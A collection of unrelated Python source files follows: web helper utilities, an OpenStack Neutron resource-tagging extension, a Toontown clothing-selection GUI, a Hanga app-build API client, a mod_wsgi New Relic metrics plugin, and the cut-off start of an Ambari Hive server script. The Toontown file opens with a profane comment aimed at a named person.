n: parameter name
"""
out = ""
try:
out = str(request.values[n])
except KeyError:
out = ""
return out
def to_int(s):
"""Converts safely to int.
On invalid output, returns 0.
Args:
s: String to convert
Returns:
int value or 0
"""
i = 0
try:
i = int(s)
except ValueError:
i = 0
except TypeError:
i = 0
return i
def get_ext(s):
"""Returns extension in lowercase.
Args:
s: Filename String
Returns:
extension of file name
"""
out = ""
try:
f = s.split(".")
out = f[len(f) - 1].lower()
except AttributeError:
out = ""
return out
def strtoken(st, pos, sep):
"""Splits string and returns splitted substring.
Returns "" if None.
Args:
st: String to split
pos: Position to return. Can be negative
sep: Separator
Returns:
string of splitted value or ""
"""
out = ""
s = st.split(sep)
if len(s) >= abs(pos) and pos != 0:
if pos > 0:
out = s[pos - 1]
else:
out = s[len(s) + pos]
return out
|
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
from neutron_lib.api import extensions as api_extensions
from neutron_lib.api import faults
from neutron_lib.api import validators
from neutron_lib import exceptions
from neutron_lib.plugins import directory
from neutron_lib.services import base as service_base
import six
import webob.exc
from neutron._i18n import _
from neutron.api import extensions
from neutron.api.v2 import resource as api_resource
from neutron.common import rpc as n_rpc
from neutron.db import standard_attr
TAG = 'tag'
TAGS = TAG + 's'
MAX_TAG_LEN = 60
TAG_PLUGIN_TYPE = 'TAG'
# Not support resources supported by tag, tag-ext
EXCEPTION_RESOURCES = ['networks', 'subnets', 'ports', 'subnetpools',
'routers']
# TODO(hichihara): This method is removed after tag, tag-ext extensions
# have been removed.
def get_tagging_supported_resources():
# Removes some resources supported by tag, tag-ext
parent_map = standard_attr.get_tag_resource_parent_map()
remove_resources = [res for res in parent_map
if res in EXCEPTION_RESOURCES]
for resource in remove_resources:
del parent_map[resource]
return parent_map
TAG_SUPPORTED_RESOURCES = get_tagging_supported_resources()
TAG_ATTRIBUTE_MAP = {
TAGS: {'allow_post': False, 'allow_put': False, 'is_visible': True}
}
class TagResourceNotFound(exceptions.NotFound):
message = _("Resource %(resource)s %(resource_id)s could not be found.")
class TagNotFound(exceptions.NotFound):
message = _("Tag %(tag)s could not be found.")
def validate_tag(tag):
msg = validators.validate_string(tag, MAX_TAG_LEN)
if msg:
raise exceptions.InvalidInput(error_message=msg)
def validate_tags(body):
if 'tags' not in body:
raise exceptions.InvalidInput(error_message=_("Invalid tags body"))
msg = validators.validate_list_of_unique_strings(body['tags'], MAX_TAG_LEN)
if msg:
raise exceptions.InvalidInput(error_message=msg)
def notify_tag_action(context, action, parent, parent_id, tags=None):
notifier = n_rpc.get_notifier('network')
tag_event = 'tag.%s' % action
# TODO(hichihara): Add 'updated_at' into payload
payload = {'parent_resource': parent,
'parent_resource_id': parent_id}
if tags is not None:
payload['tags'] = tags
notifier.info(context, tag_event, payload)
class TaggingController(object):
def __init__(self):
self.plugin = directory.get_plugin(TAG_PLUGIN_TYPE)
self.supported_resources = TAG_SUPPORTED_RESOURCES
def _get_parent_resource_and_id(self, kwargs):
for key in kwargs:
for resource in self.supported_resources:
if key == self.supported_resources[resource] + '_id':
return resource, kwargs[key]
return None, None
def index(self, request, **kwargs):
# GET /v2.0/networks/{network_id}/tags
parent, parent_id = self._get_parent_resource_and_id(kwargs)
return self.plugin.get_tags(request.context, parent, parent_id)
def show(self, request, id, **kwargs):
# GET /v2.0/networks/{network_id}/tags/{tag}
# id == tag
validate_tag(id)
parent, parent_id = self._get_parent_resource_and_id(kwargs)
return self.plugin.get_tag(request.context, parent, parent_id, id)
def create(self, request, **kwargs):
# not supported
# POST /v2.0/networks/{network_id}/tags
raise webob.exc.HTTPNotFound("not supported")
def update(self, request, id, **kwargs):
# PUT /v2.0/networks/{network_id}/tags/{tag}
# id == tag
validate_tag(id)
parent, parent_id = self._get_parent_resource_and_id(kwargs)
notify_tag_action(request.context, 'create.start',
parent, parent_id, [id])
result = self.plugin.update_tag(request.context, parent, parent_id, id)
notify_tag_action(request.context, 'create.end',
parent, parent_id, [id])
return result
def update_all(self, request, body, **kwargs):
# PUT /v2.0/networks/{network_id}/tags
# body: {"tags": ["aaa", "bbb"]}
validate_tags(body)
parent, parent_id = self._get_parent_resource_and_id(kwargs)
notify_tag_action(request.context, 'update.start',
parent, parent_id, body['tags'])
result = self.plugin.update_tags(request.context, parent,
parent_id, body)
notify_tag_action(request.context, 'update.end',
parent, parent_id, body['tags'])
return result
def delete(self, request, id, **kwargs):
# DELETE /v2.0/networks/{network_id}/tags/{tag}
# id == tag
validate_tag(id)
parent, parent_id = self._get_parent_resource_and_id(kwargs)
notify_tag_action(request.context, 'delete.start',
parent, parent_id, [id])
result = self.plugin.delete_tag(request.context, parent, parent_id, id)
notify_tag_action(request.context, 'delete.end',
parent, parent_id, [id])
return result
def delete_all(self, request, **kwargs):
# DELETE /v2.0/networks/{network_id}/tags
parent, parent_id = self._get_parent_resource_and_id(kwargs)
notify_tag_action(request.context, 'delete_all.start',
parent, parent_id)
result = self.plugin.delete_tags(request.context, parent, parent_id)
notify_tag_action(request.context, 'delete_all.end',
parent, parent_id)
return result
class Tagging(api_extensions.ExtensionDescriptor):
"""Extension class supporting tags."""
@classmethod
def get_name(cls):
return ("Tag support for resources with standard attribute: %s"
% ', '.join(TAG_SUPPORTED_RESOURCES.values()))
@classmethod
def get_alias(cls):
return "standard-attr-tag"
@classmethod
def get_description(cls):
return "Enables to set tag on resources with standard attribute."
@classmethod
def get_updated(cls):
return "2017-01-01T00:00:00-00:00"
def get_required_extensions(self):
# This is needed so that depending project easily moves from old
# extensions although this extension self can run without them.
return ['tag', 'tag-ext']
@classmethod
def get_resources(cls):
"""Returns Ext Resources."""
exts = []
action_status = {'index': 200, 'show': 204, 'update': 201,
'update_all': 200, 'delete': 204, 'delete_all': 204}
controller = api_resource.Resource(TaggingController(),
faults.FAULT_MAP,
action_status=action_status)
collection_methods = {"delete_all": "DELETE",
"update_all": "PUT"}
exts = []
for collection_name, member_name in TAG_SUPPORTED_RESOURCES.items():
if 'security_group' in collection_name:
collection_name = collection_name.replace('_', '-')
parent = {'member_name': member_name,
'collection_name': collection_name}
exts.append(extensions.ResourceExtension(
TAGS, controller, parent,
collection_methods=collection_methods))
return exts
def get_extended_resources(self, version):
if version != "2.0":
return {}
EXTENDED_ATTRIBUTES_2_0 = {}
for collection_name in TAG_SUPPORTED_RESOURCES:
EXTENDED_ATTRIBUTES_2_0[collection_name] = TAG_ATTRIBUTE_MAP
return EXTENDED_ATTRIBUTES_2_0
@six.add_metaclass(abc.ABCMeta)
class TagPluginBase(service_base.ServicePluginBase):
"""REST API to operate the Tag."""
def get_plugin_description(self):
return "Tag support"
@classmethod
def get_plugin_type(cls):
return TAG_PLUGIN_TYPE
@abc.abstractmethod
def get_tags(self, context, resource, resource_id):
pass
@abc.abstractmethod
def get_tag(self, context, resource, resource_id, tag):
pass
@abc.abstractmethod
def update_tags(self, context, resource, resource_id, body):
pass
@abc.abstractmethod
def update_tag(self, context, resource, resource_id, tag):
pass
@abc.abstractmethod
def delete_tags(self, context, resource, resource_id):
pass
@abc.abstractmethod
def delete_tag(self, context, resource, resource_id, tag):
pass
|
|
# Fuck you Disyer. Stealing my fucking paypal. GET FUCKED: toontown.makeatoon.ClothesGUI
from toontown.toon import ToonDNA
from direct.fsm import StateData
from direct.gui.DirectGui import *
from MakeAToonGlobals import *
from toontown.toonbase import TTLocalizer
from direct.directnotify import DirectNotifyGlobal
import ShuffleButton
import random
CLOTHES_MAKETOON = 0
CLOTHES_TAILOR = 1
CLOTHES_CLOSET = 2
class ClothesGUI(StateData.StateData):
notify = DirectNotifyGlobal.directNotify.newCategory('ClothesGUI')
def __init__(self, type, doneEvent, swapEvent = None):
StateData.StateData.__init__(self, doneEvent)
self.type = type
self.toon = None
self.swapEvent = swapEvent
self.gender = '?'
self.girlInShorts = 0
self.swappedTorso = 0
return
def load(self):
self.matGui = loader.loadModel('phase_3/models/gui/tt_m_gui_mat_mainGui')
guiRArrowUp = self.matGui.find('**/tt_t_gui_mat_arrowUp')
guiRArrowRollover = self.matGui.find('**/tt_t_gui_mat_arrowUp')
guiRArrowDown = self.matGui.find('**/tt_t_gui_mat_arrowDown')
guiRArrowDisabled = self.matGui.find('**/tt_t_gui_mat_arrowDisabled')
self.shuffleFrame = self.matGui.find('**/tt_t_gui_mat_shuffleFrame')
shuffleArrowUp = self.matGui.find('**/tt_t_gui_mat_shuffleArrowUp')
shuffleArrowDown = self.matGui.find('**/tt_t_gui_mat_shuffleArrowDown')
shuffleArrowRollover = self.matGui.find('**/tt_t_gui_mat_shuffleArrowUp')
shuffleArrowDisabled = self.matGui.find('**/tt_t_gui_mat_shuffleArrowDisabled')
self.parentFrame = DirectFrame(relief=DGG.RAISED, pos=(0.98, 0, 0.416), frameColor=(1, 0, 0, 0))
self.parentFrame.setPos(-0.36, 0, -0.5)
self.parentFrame.reparentTo(base.a2dTopRight)
self.shirtFrame = DirectFrame(parent=self.parentFrame, image=self.shuffleFrame, image_scale=halfButtonInvertScale, relief=None, pos=(0, 0, -0.4), hpr=(0, 0, 3), scale=1.2, frameColor=(1, 1, 1, 1), text=TTLocalizer.ClothesShopShirt, text_scale=0.0575, text_pos=(-0.001, -0.015), text_fg=(1, 1, 1, 1))
self.topLButton = DirectButton(parent=self.shirtFrame, relief=None, image=(shuffleArrowUp,
shuffleArrowDown,
shuffleArrowRollover,
shuffleArrowDisabled), image_scale=halfButtonScale, image1_scale=halfButtonHoverScale, image2_scale=halfButtonHoverScale, pos=(-0.2, 0, 0), command=self.swapTop, extraArgs=[-1])
self.topRButton = DirectButton(parent=self.shirtFrame, relief=None, image=(shuffleArrowUp,
shuffleArrowDown,
shuffleArrowRollover,
shuffleArrowDisabled), image_scale=halfButtonInvertScale, image1_scale=halfButtonInvertHoverScale, image2_scale=halfButtonInvertHoverScale, pos=(0.2, 0, 0), command=self.swapTop, extraArgs=[1])
self.bottomFrame = DirectFrame(parent=self.parentFrame, image=self.shuffleFrame, image_scale=halfButtonInvertScale, relief=None, pos=(0, 0, -0.65), hpr=(0, 0, -2), scale=1.2, frameColor=(1, 1, 1, 1), text=TTLocalizer.ColorShopToon, text_scale=0.0575, text_pos=(-0.001, -0.015), text_fg=(1, 1, 1, 1))
self.bottomLButton = DirectButton(parent=self.bottomFrame, relief=None, image=(shuffleArrowUp,
shuffleArrowDown,
shuffleArrowRollover,
shuffleArrowDisabled), image_scale=halfButtonScale, image1_scale=halfButtonHoverScale, image2_scale=halfButtonHoverScale, pos=(-0.2, 0, 0), command=self.swapBottom, extraArgs=[-1])
self.bottomRButton = DirectButton(parent=self.bottomFrame, relief=None, image=(shuffleArrowUp,
shuffleArrowDown,
shuffleArrowRollover,
shuffleArrowDisabled), image_scale=halfButtonInvertScale, image1_scale=halfButtonInvertHoverScale, image2_scale=halfButtonInvertHoverScale, pos=(0.2, 0, 0), command=self.swapBottom, extraArgs=[1])
self.parentFrame.hide()
self.shuffleFetchMsg = 'ClothesShopShuffle'
self.shuffleButton = ShuffleButton.ShuffleButton(self, self.shuffleFetchMsg)
return
def unload(self):
self.matGui.removeNode()
del self.matGui
self.parentFrame.destroy()
self.shirtFrame.destroy()
self.bottomFrame.destroy()
self.topLButton.destroy()
self.topRButton.destroy()
self.bottomLButton.destroy()
self.bottomRButton.destroy()
del self.shuffleFrame
del self.parentFrame
del self.shirtFrame
del self.bottomFrame
del self.topLButton
del self.topRButton
del self.bottomLButton
del self.bottomRButton
self.shuffleButton.unload()
self.ignore('MAT-newToonCreated')
def showButtons(self):
self.parentFrame.show()
def hideButtons(self):
self.parentFrame.hide()
def enter(self, toon):
self.notify.debug('enter')
base.disableMouse()
self.toon = toon
self.setupScrollInterface()
if not self.type == CLOTHES_TAILOR:
currTop = (self.toon.style.topTex,
self.toon.style.topTexColor,
self.toon.style.sleeveTex,
self.toon.style.sleeveTexColor)
currTopIndex = self.tops.index(currTop)
self.swapTop(currTopIndex - self.topChoice)
currBottom = (self.toon.style.botTex, self.toon.style.botTexColor)
currBottomIndex = self.bottoms.index(currBottom)
self.swapBottom(currBottomIndex - self.bottomChoice)
choicePool = [self.tops, self.bottoms]
self.shuffleButton.setChoicePool(choicePool)
self.accept(self.shuffleFetchMsg, self.changeClothes)
self.acceptOnce('MAT-newToonCreated', self.shuffleButton.cleanHistory)
def exit(self):
try:
del self.toon
except:
self.notify.warning('ClothesGUI: toon not found')
self.hideButtons()
self.ignore('enter')
self.ignore('next')
self.ignore('last')
self.ignore(self.shuffleFetchMsg)
def setupButtons(self):
self.girlInShorts = 0
if self.gender == 'f':
if self.bottomChoice == -1:
botTex = self.bottoms[0][0]
else:
botTex = self.bottoms[self.bottomChoice][0]
if ToonDNA.GirlBottoms[botTex][1] == ToonDNA.SHORTS:
self.girlInShorts = 1
if self.toon.style.getGender() == 'm':
self.bottomFrame['text'] = TTLocalizer.ClothesShopShorts
else:
self.bottomFrame['text'] = TTLocalizer.ClothesShopBottoms
self.acceptOnce('last', self.__handleBackward)
self.acceptOnce('next', self.__handleForward)
return None
def swapTop(self, offset):
length = len(self.tops)
self.topChoice += offset
if self.topChoice <= 0:
self.topChoice = 0
self.updateScrollButtons(self.topChoice, length, 0, self.topLButton, self.topRButton)
if self.topChoice < 0 or self.topChoice >= len(self.tops) or len(self.tops[self.topChoice]) != 4:
self.notify.warning('topChoice index is out of range!')
return
else:
self.toon.style.topTex = self.tops[self.topChoice][0]
self.toon.style.topTexColor = self.tops[self.topChoice][1]
self.toon.style.sleeveTex = self.tops[self.topChoice][2]
self.toon.style.sleeveTexColor = self.tops[self.topChoice][3]
self.toon.generateToonClothes()
if self.swapEvent != None:
messenger.send(self.swapEvent)
messenger.send('wakeup')
return
def swapBottom(self, offset):
length = len(self.bottoms)
self.bottomChoice += offset
if self.bottomChoice <= 0:
self.bottomChoice = 0
self.updateScrollButtons(self.bottomChoice, length, 0, self.bottomLButton, self.bottomRButton)
if self.bottomChoice < 0 or self.bottomChoice >= len(self.bottoms) or len(self.bottoms[self.bottomChoice]) != 2:
self.notify.warning('bottomChoice index is out of range!')
return
else:
self.toon.style.botTex = self.bottoms[self.bottomChoice][0]
self.toon.style.botTexColor = self.bottoms[self.bottomChoice][1]
if self.toon.generateToonClothes() == 1:
self.toon.loop('neutral', 0)
self.swappedTorso = 1
if self.swapEvent != None:
messenger.send(self.swapEvent)
messenger.send('wakeup')
return
def updateScrollButtons(self, choice, length, startTex, lButton, rButton):
if choice >= length - 1:
rButton['state'] = DGG.DISABLED
else:
rButton['state'] = DGG.NORMAL
if choice <= 0:
lButton['state'] = DGG.DISABLED
else:
lButton['state'] = DGG.NORMAL
def __handleForward(self):
self.doneStatus = 'next'
messenger.send(self.doneEvent)
def __handleBackward(self):
self.doneStatus = 'last'
messenger.send(self.doneEvent)
def resetClothes(self, style):
if self.toon:
self.toon.style.makeFromNetString(style.makeNetString())
if self.swapEvent != None and self.swappedTorso == 1:
self.toon.swapToonTorso(self.toon.style.torso, genClothes=0)
self.toon.generateToonClothes()
self.toon.loop('neutral', 0)
return
def changeClothes(self):
self.notify.debug('Entering changeClothes')
newChoice = self.shuffleButton.getCurrChoice()
if newChoice[0] in self.tops:
newTopIndex = self.tops.index(newChoice[0])
else:
newTopIndex = self.topChoice
if newChoice[1] in self.bottoms:
newBottomIndex = self.bottoms.index(newChoice[1])
else:
newBottomIndex = self.bottomChoice
oldTopIndex = self.topChoice
oldBottomIndex = self.bottomChoice
self.swapTop(newTopIndex - oldTopIndex)
self.swapBottom(newBottomIndex - oldBottomIndex)
def getCurrToonSetting(self):
return [self.tops[self.topChoice], self.bottoms[self.bottomChoice]]
|
|
import requests
from hanga.utils import TrackedFile
from hanga import appdirs
from json import dumps
from os import environ, makedirs
from os.path import join, exists
try:
from configparser import ConfigParser
except ImportError:
from ConfigParser import ConfigParser
class HangaException(Exception):
pass
class HangaAPI(object):
"""API to communicate with Hanga"""
def __init__(self, key=None, url=None):
super(HangaAPI, self).__init__()
self.read_configuration()
c = self.config
# possible url location (in order of importance)
urls = (url,
environ.get("HANGA_URL"),
c.get("auth", "url") if
c.has_option("auth", "url") else None,
"https://hanga.io")
# possible keys location (in order of importance)
keys = (key,
environ.get("HANGA_API_KEY"),
c.get("auth", "apikey") if
c.has_option("auth", "apikey") else None)
self._url = next((x for x in urls if x))
self._key = next((x for x in keys if x), None)
def submit(self, args, filename, callback=None):
"""Submit a packaged app to build. Filename should point on a
structured zip containing the app, buildozer.spec adjusted for it,
and others deps if needed. Args should be the line used for building
the app.
The result is a dict that contain::
{
"result": "ok",
"uuid": "f18cafae-c730-11e3-add4-04011676f501",
}
Or if there is a failure::
{
"result": "error",
"details": "Something bad happened"
}
"""
self.ensure_configuration()
fd = None
try:
fd = TrackedFile(filename, callback=callback)
params = {"args": dumps(args)}
r = self._build_request(
requests.post, "submit", data=fd, params=params, stream=True)
finally:
if fd:
fd.close()
return r.json()
def download(self, uuid, dest_dir, callback=None):
"""Download the result of a job build. If a callback is passed, it will
be called with the size of the content received and the total size of
the content.
Return the name of the filename in the dest_dir.
"""
self.ensure_configuration()
r = self._build_request(requests.get,
"{}/dl".format(uuid), stream=True)
# ensure the name is shared in the content-disposition
disposition = r.headers.get("content-disposition")
if not disposition or not disposition.startswith("attachment;"):
raise HangaException("File not attached, nothing to download")
filename = disposition.split("filename=", 1)[-1]
if not filename:
raise HangaException("Empty filename")
dest_fn = join(dest_dir, filename)
index = 0
length = int(r.headers.get("Content-Length"))
if callback:
callback(0, length)
with open(dest_fn, "wb") as fd:
for content in r.iter_content(chunk_size=8192):
fd.write(content)
index += len(content)
if callback:
callback(index, length)
return filename
def status(self, uuid):
"""Return the status of a job, in a form of a dictionary::
{
"result": "ok",
"job_status": "packaging",
"job_progression": "78"
}
The `result` can be either "OK" or "error" if something happens.
The `job_status` can be a lot of things, depending on the Hanga
version running. It ends only with a status of "done" or "error".
"""
self.ensure_configuration()
r = self._build_request(requests.get, "{}/status".format(uuid))
return r.json()
def importkey(self, platform, name, **infos):
"""Import a key to Hanga. Then you can associate the key to your app.
`platform` is one of the supported platform in Hanga. Currently, only
"android" is considered as valid.
Depending of the platform, you will have multiples informations to
pass.
For android, you'll need `keystore`, `keystore_password`, `alias`,
`alias_password`.
The result is a dict that contain::
{
"result": "ok",
}
Or if there is a failure::
{
"result": "error",
"details": "Something bad happened"
}
"""
assert(platform == "android")
assert(name)
if platform == "android":
assert(infos.get("keystore"))
assert(exists(infos.get("keystore")))
assert(infos.get("keystore_password"))
assert(infos.get("alias"))
assert(infos.get("alias_password"))
self.ensure_configuration()
fd = None
try:
fd = open(infos["keystore"], "rb")
params = {
"platform": platform,
"name": name,
"keystore-password": infos["keystore_password"],
"alias-password": infos["alias_password"],
"alias": infos["alias"]}
files = {"keystore-file": fd}
r = self._build_request(
requests.post, "importkey", data=params, files=files)
finally:
if fd:
fd.close()
return r.json()
def _build_request(self, method, path, **kwargs):
url = "{}api/1/{}".format(self._url, path)
headers = {"X-Hanga-Api": self._key}
r = method(url, headers=headers, **kwargs)
try:
r.raise_for_status()
except requests.exceptions.HTTPError:
if r.status_code:
msg = "Access denied, invalid HANGA_API_KEY"
else:
msg = "Request error ({})".format(r.status_code)
raise HangaException(msg)
return r
def ensure_configuration(self):
"""
Validate that the configuration is ok to call any API commands
"""
if not self._key:
raise HangaException("Missing Hanga API Key")
if not self._url.endswith("/"):
self._url += "/"
def read_configuration(self):
"""
Read the configuration file. This is already done by the
constructor.
"""
self.config = ConfigParser()
self.config.read(self.config_fn)
if not self.config.has_section("auth"):
self.config.add_section("auth")
def write_configuration(self):
"""
Write the current configuration to the file
"""
with open(self.config_fn, "w") as fd:
self.config.write(fd)
@property
def config_fn(self):
if not exists(self.user_config_dir):
makedirs(self.user_config_dir)
return join(self.user_config_dir, 'hanga.conf')
@property
def user_config_dir(self):
return appdirs.user_config_dir('Hanga', 'Melting Rocks')
|
|
import os
import logging
import math
import psutil
try:
from ConfigParser import RawConfigParser, NoOptionError, NoSectionError
except ImportError:
from configparser import RawConfigParser, NoOptionError, NoSectionError
import mod_wsgi
from .platform import Client
from ..sampler import Sampler
from ..statistics import Metrics, Stats
_logger = logging.getLogger(__name__)
def configuration_settings(app_name=None, license_key=None,
config_file=None, environment=None):
if config_file is None:
config_file = os.environ.get('NEW_RELIC_CONFIG_FILE', None)
if config_file is not None:
config_object = RawConfigParser()
if config_file:
config_object.read([config_file])
if environment is None:
environment = os.environ.get('NEW_RELIC_ENVIRONMENT', None)
def _option(name, section='newrelic', type=None, **kwargs):
try:
getter = 'get%s' % (type or '')
return getattr(config_object, getter)(section, name)
except NoOptionError:
if 'default' in kwargs:
return kwargs['default']
else:
raise
def option(name, type=None, **kwargs):
sections = []
if environment is not None:
sections.append('newrelic-platform:%s' % environment)
sections.append('newrelic-platform')
if environment is not None:
sections.append('newrelic:%s' % environment)
sections.append('newrelic')
for section in sections:
try:
return _option(name, section, type)
except (NoOptionError, NoSectionError):
pass
if 'default' in kwargs:
return kwargs['default']
if app_name is None:
app_name = os.environ.get('NEW_RELIC_APP_NAME', None)
app_name = option('app_name', default=app_name)
if license_key is None:
license_key = os.environ.get('NEW_RELIC_LICENSE_KEY', None)
license_key = option('license_key', default=license_key)
else:
if app_name is None:
app_name = os.environ.get('NEW_RELIC_APP_NAME', None)
if license_key is None:
license_key = os.environ.get('NEW_RELIC_LICENSE_KEY', None)
if app_name is not None:
app_name = app_name.split(';')[0].strip()
return app_name, license_key
class Agent(object):
guid = 'au.com.dscpl.wsgi.mod_wsgi'
version = '1.1.0'
max_retries = 10
def __init__(self, sampler=None, app_name=None, license_key=None,
config_file=None, environment=None):
self.sampler = None
if mod_wsgi.version < (4, 2, 0):
_logger.fatal('Version 4.2.0 or newer of mod_wsgi is required '
'for running the New Relic platform plugin. The plugin '
'has been disabled.')
return
app_name, license_key = configuration_settings(app_name,
license_key, config_file, environment)
if not license_key or not app_name:
_logger.fatal('Either the license key or application name was '
'not specified for the New Relic platform plugin. The '
'plugin has been disabled.')
return
_logger.info('New Relic platform plugin reporting to %r.', app_name)
self.client = Client(license_key)
self.license_key = license_key
self.app_name = app_name
self.sampler = sampler or Sampler()
self.sampler.register(self.process)
self.metrics = Metrics()
self.epoch = None
self.retries = 0
def upload(self, metrics, duration):
try:
self.client.send_metrics(self.app_name, self.guid, self.version,
duration, metrics)
except self.client.RetryDataForRequest:
return True
except Exception:
pass
return False
def record(self, name, value):
name = 'Component/' + name
self.metrics.merge_value(name, value)
def rollover(self):
self.metrics = Metrics()
self.epoch = None
self.retries = 0
def process(self, scoreboard):
# Record metric to track how many Apache server instances are
# reporting. The 'Server/Instances' metric should be charted as
# a 'Count', rounded to an 'Integer'.
self.record('Server/Instances[|servers]', 0)
# If this is the first sampling period, take that to mean that
# this is a new process and Apache was just (re)started. If we
# are being told the sampler is exiting, we take it that Apache
# is being shutdown. Both can show up if shutdown during the
# first sampling period. The 'Server/Lifecycle' metrics should
# be charted as a 'Count', rounded to an 'Integer'.
if scoreboard.sample_periods == 1:
self.record('Server/Lifecycle/Starting[|servers]', 0)
if scoreboard.sampler_exiting:
self.record('Server/Lifecycle/Stopping[|servers]', 0)
# Record metric to track how many processes are in use. This is
# calculated as an average from the total number which which
# were reported in use in each individual sample. The
# 'Process/Instances' metric should be charted as a 'Count',
# rounded to an 'Integer'.
self.record('Processes/Instances[|processes]', Stats(
count=scoreboard.processes_running))
# Also separately record how many processes were counted as
# having been started or stopped in the sampling period. These
# would be used to represent the amount of process churn which
# is occuring due to Apache's dynamic management of the number
# of processes. The 'Process/Lifecycle' metrics should be
# charted as a 'Count', rounded to an 'Integer'.
self.record('Processes/Lifecycle/Starting[|processes]',
Stats(count=scoreboard.processes_started_count))
self.record('Processes/Lifecycle/Stopping[|processes]',
Stats(count=scoreboard.processes_stopped_count))
# Record metric to track how many workers are in idle and busy
# states. This is calculated as an average from the total number
# which were reported in each state in each individual sample.
# The 'Workers/Availability' metrics should be charted as a
# 'Count', rounded to an 'Integer'.
self.record('Workers/Availability/Idle[|workers]', Stats(
count=scoreboard.workers_idle))
self.record('Workers/Availability/Busy[|workers]', Stats(
count=scoreboard.workers_busy))
# Record metric to track more fine grained status of each
# worker. This is calculated as an average from the total number
# which were reported in each state in each individual sample.
# The 'Workers/Status' metrics should be charted as 'Average'
# value, rounded to an 'Integer'.
for label, value in scoreboard.workers_status.items():
self.record('Workers/Status/%s[workers]' % label, value)
# Record metric to track the utilisation of the server. The
# 'Workers/Utilization' metric should be charted as 'Average
# value', with number format of 'Percentage'.
self.record('Workers/Utilization[server]',
scoreboard.workers_utilization)
# Record metric to track the request throughput. The
# 'Requests/Throughput' metric should be charted as 'Throughput'.
self.record('Requests/Throughput[|requests]', Stats(
count=scoreboard.access_count_delta,
total=scoreboard.access_count_delta))
# Record metric to track number of bytes served up. This is
# believed only to be from response content. There is no known
# separate measure for bytes uploaded. The 'Requests/Bytes Served'
# should be charted as 'Rate'.
self.record('Requests/Bytes Served[bytes]',
scoreboard.bytes_served_delta)
# Record metric to track request response time. This is
# calculated as an average from the request samples. That is, it
# is not across all requests. The 'Requests/Response Time'
# metric should be charted as 'Average'.
for request in scoreboard.request_samples:
self.record('Requests/Response Time[seconds|request]',
request.duration)
# Record metric to track percentile breakdown of request
# response time. That is, it is not across all requests. The
# 'Requests/Percentiles' metric should be charted as 'Average'.
for label, value in scoreboard.request_percentiles.items():
self.record('Requests/Percentiles/%s[seconds]' % label, value)
# Record metric to track what percentage of all requests were
# captured as samples. The 'Requests/Sample Quality' metric
# should be charted as 'Average' converted to a 'Percentage'.
self.record('Requests/Sample Quality[requests]',
scoreboard.request_samples_quality)
user_time = 0.0
system_time = 0.0
memory_rss = 0
for process in scoreboard.processes_system_info.values():
user_time += process['cpu_user_time']
system_time += process['cpu_system_time']
memory_rss += process['memory_rss']
# Record metric to track memory usage by processes. The
# 'Processes/Memory/Physical' metric should be charted as
# 'Average'.
self.record('Processes/Memory/Physical[bytes]',
process['memory_rss'])
# Record metrics to track the number of context switches.
# The 'Processes/Context Switches' metrics should be charted
# as 'Rate'.
self.record('Processes/Context Switches/Voluntary[context]',
process['ctx_switch_voluntary'])
self.record('Processes/Context Switches/Involuntary[context]',
process['ctx_switch_involuntary'])
# Record metric to track combined memory usage of whole server.
# The 'Server/Memory/Physical' metric should be charted as
# 'Average'.
self.record('Server/Memory/Physical[bytes]', memory_rss)
# Record metric to track the CPU usage for user and system. The
# 'Processes/CPU Usage' metric should be charted as 'Rate'.
self.record('Processes/CPU Usage[cpu]', user_time + system_time)
self.record('Processes/CPU Usage/User[cpu]', user_time)
self.record('Processes/CPU Usage/System[cpu]', system_time)
# Now attempt to upload the metric data to New Relic. Make sure
# we don't try and upload data from too short of a sampling
# period as it will be rejected anyway. Retain any which is too
# short so it is merged with subsequent sampling period.
if self.epoch is not None:
duration = scoreboard.period_end - self.epoch
else:
duration = scoreboard.duration
if duration > 1.0:
retry = self.upload(self.metrics.metrics, duration)
else:
retry = True
# If a failure occurred but the failure type was such that we
# could try again to upload the data, then retain the metrics
# for next time. If we have two many failed attempts though we
# give up.
if retry:
self.retries += 1
if self.retries == self.max_retries:
self.rollover()
elif self.epoch is None:
self.epoch = scoreboard.period_start
else:
self.rollover()
def start(self):
if self.sampler is not None:
self.sampler.start()
|
|
#!/usr/bin/env python
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Python Imports
import subprocess
import os
import re
import time
import shutil
from datetime import datetime
import json
# Ambari Commons & Resource Management imports
from resource_management.libraries.script.script import Script
from resource_management.libraries.functions import format
from resource_management.libraries.functions.check_process_status import check_process_status
from resource_management.core.source import InlineTemplate
from resource_management.core.resources.system import Execute
# Imports needed for Rolling/Express Upgrade
from resource_management.libraries.functions import StackFeature
from resource_management.libraries.functions.stack_features import check_stack_feature
from resource_management.libraries.functions import conf_select
from resource_management.libraries.functions import stack_select
from resource_management.libraries.functions.copy_tarball import copy_to_hdfs
from resource_management.core import shell
from resource_management.core.exceptions import Fail
from resource_management.core.logger import Logger
from ambari_commons import OSCheck, OSConst
from ambari_commons.os_family_impl import OsFamilyImpl
from resource_management.core.exceptions import ComponentIsNotRunning
from resource_management.libraries.functions.decorator import retry
from resource_management.libraries.functions.security_commons import build_expectations, \
cached_kinit_executor, get_params_from_filesystem, validate_security_config_properties, \
FILE_TYPE_XML
# Local Imports
from setup_ranger_hive import setup_ranger_hive
from hive_service_interactive import hive_service_interactive
from hive_interactive import hive_interactive
from hive_server import HiveServerDefault
from setup_ranger_hive_interactive import setup_ranger_hive_interactive
import traceback
class HiveServerInteractive(Script):
pass
@OsFamilyImpl(os_family=OsFamilyImpl.DEFAULT)
class HiveServerInteractiveDefault(HiveServerInteractive):
def get_component_name(self):
return "hive-server2-hive2"
def install(self, env):
import params
self.install_packages(env)
def configure(self, env):
import params
env.set_params(params)
hive_interactive(name='hiveserver2')
def pre_upgrade_restart(self, env, upgrade_type=None):
